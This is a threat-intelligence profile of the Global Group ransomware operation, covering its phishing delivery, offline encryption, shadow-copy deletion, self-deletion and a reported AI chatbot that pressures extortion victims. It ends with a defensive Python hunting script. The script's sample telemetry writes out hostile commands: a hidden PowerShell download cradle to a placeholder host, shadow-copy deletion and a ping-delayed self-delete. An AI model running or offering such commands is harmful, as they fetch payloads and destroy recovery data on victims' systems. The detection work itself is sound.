Global Group
Global Group is a ransomware family and ransomware-as-a-service (RaaS) operation that emerged in 2025 and is described in available reporting as a successor to the Mamona ransomware family; some reporting also suggests it may be linked to, or a rebrand of, BlackLock/Black Lock. It has been delivered in phishing campaigns associated with the Phorpiex botnet, including high-volume malspam using subjects such as "Your Document" and ZIP attachments containing double-extension Windows shortcut files such as "Document.doc.lnk". When executed, the LNK launches cmd.exe and PowerShell to download and run the ransomware payload, sometimes under names resembling legitimate Windows files such as "windrv.exe", relying on living-off-the-land techniques to reduce detection.
A notable capability is its offline or "mute" mode: Global Group generates encryption keys locally on the victim host and does not require command-and-control communication to begin encryption, making it viable in offline and air-gapped environments and reducing opportunities for network-based detection. The malware is reported to use ChaCha20-Poly1305 for encryption, append the ".Reco" extension to encrypted files, delete Volume Shadow Copies, terminate analysis and database-related processes to maximize encryption impact, introduce a short delay by pinging 127.0.0.7, and then self-delete to reduce forensic artifacts. Reporting also states that it changes the victim's desktop wallpaper to display a ransom note. One source explicitly notes that this strain conducts no data exfiltration and performs all activity locally on the compromised system.
Operationally, Global Group is described as a RaaS operation with a Tor-based negotiation portal. Reporting states that victims are directed from the ransom note to this portal, where an AI chatbot interacts with victims, automates communications, and applies psychological pressure during negotiations. Reviewed chat transcripts reportedly showed demands reaching seven-figure sums, including 9.5 BTC in one case. The group has been mentioned alongside other 2025 ransomware brands and was reported claiming a breach of Albavisión involving the alleged theft of 400 GB of data. High-confidence infection-chain indicators and behaviors mentioned in the reporting include phishing emails with LNK attachments disguised as documents, use of cmd.exe and PowerShell, payload names such as windrv.exe, local key generation, ChaCha20-Poly1305 encryption, deletion of shadow copies, self-deletion after a ping-based delay, process termination, the ".Reco" file extension, and use of a Tor negotiation portal with an AI chatbot.
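The behaviors listed above translate directly into host-based hunting logic. The following is an added example (not code from the original page or from any vendor) that runs simple regex heuristics for each reported behavior over constructed endpoint telemetry records; the sample command lines, file paths and the placeholder download host are invented for illustration.

```python
import re

# Heuristics for the Global Group infection chain described above; one regex per behaviour,
# applied case-insensitively to a command line or file path taken from endpoint telemetry.
RULES = {
    # Lure: double-extension shortcut such as Document.doc.lnk extracted from the phishing ZIP
    "double_extension_lnk": r"\.(?:doc|docx|pdf|xls|xlsx|txt)\.lnk$",
    # Living-off-the-land: PowerShell download cradle writing into a user-writable location
    "powershell_download_cradle": r"powershell.*(?:iwr|invoke-webrequest|downloadfile|downloadstring).*(?:%temp%|appdata|\\users\\)",
    # Payload name resembling a Windows component
    "windrv_payload_name": r"\bwindrv\.exe\b",
    # Recovery inhibition: Volume Shadow Copy deletion
    "shadow_copy_deletion": r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete",
    # Ping to a non-standard loopback address used as a delay, chained to a delete (self-removal)
    "ping_delay_self_delete": r"ping(?:\.exe)?\s+127\.0\.0\.(?:[2-9]|\d{2,3}).*(?:&|;|\|)\s*del\b",
    # Encrypted-file marker: the .Reco extension
    "reco_extension": r"\.reco$",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

def match_rules(value: str) -> list[str]:
    """Return the names of all rules whose pattern fires on one telemetry value."""
    return [name for name, rx in COMPILED.items() if rx.search(value)]

def triage(events: list[dict]) -> dict[int, list[str]]:
    """Map event id -> matched rule names, keeping only events with at least one hit."""
    hits = {}
    for ev in events:
        names = match_rules(ev["value"])
        if names:
            hits[ev["id"]] = names
    return hits

# Constructed sample telemetry (file-create and process-create records); not from a real incident.
SAMPLE_EVENTS = [
    {"id": 1, "kind": "file", "value": r"C:\Users\alice\Downloads\Document.doc.lnk"},
    {"id": 2, "kind": "process", "value": r'cmd.exe /c powershell -w hidden -c "iwr http://placeholder.invalid/windrv.exe -OutFile %TEMP%\windrv.exe"'},
    {"id": 3, "kind": "process", "value": r"C:\Users\alice\AppData\Local\Temp\windrv.exe"},
    {"id": 4, "kind": "process", "value": r"vssadmin.exe Delete Shadows /All /Quiet"},
    {"id": 5, "kind": "process", "value": r'cmd.exe /c ping 127.0.0.7 -n 3 > nul & del "C:\Users\alice\AppData\Local\Temp\windrv.exe"'},
    {"id": 6, "kind": "file", "value": r"C:\Users\alice\Documents\budget.xlsx.Reco"},
    {"id": 7, "kind": "process", "value": r"ping 127.0.0.1 -n 1"},  # benign: standard loopback, no chained delete
    {"id": 8, "kind": "file", "value": r"C:\Users\alice\Documents\notes.txt"},  # benign
]

if __name__ == "__main__":
    for eid, names in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"event {eid}: {', '.join(names)}")
```

Several rules firing on one host within a short window (lure file, payload name, shadow copy deletion, ping-delayed self-delete) is a far stronger signal than any single match, since the ping and vssadmin patterns also appear in legitimate administrative scripts.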
Recent activity
11 sources tracked across advisories, community write-ups, and news.
Ransomware delivered via phishing (ZIP + double-extension LNK) that can run offline, generates local ChaCha20-Poly1305 keys, deletes shadow copies, self-deletes, and kills analysis/database-related processes.
RaaS operation active since early June 2025 targeting multiple regions and sectors; uses AI-driven negotiation tooling.
Ransomware strain delivered via malspam campaigns attributed to Phorpiex botnet activity.
Ransomware featuring an offline-capable encryption mode ("mute" mode) that generates keys locally, uses ChaCha20-Poly1305 for encryption, attempts to delete volume shadow copies to hinder recovery, and self-deletes after a short delay to reduce forensic artifacts.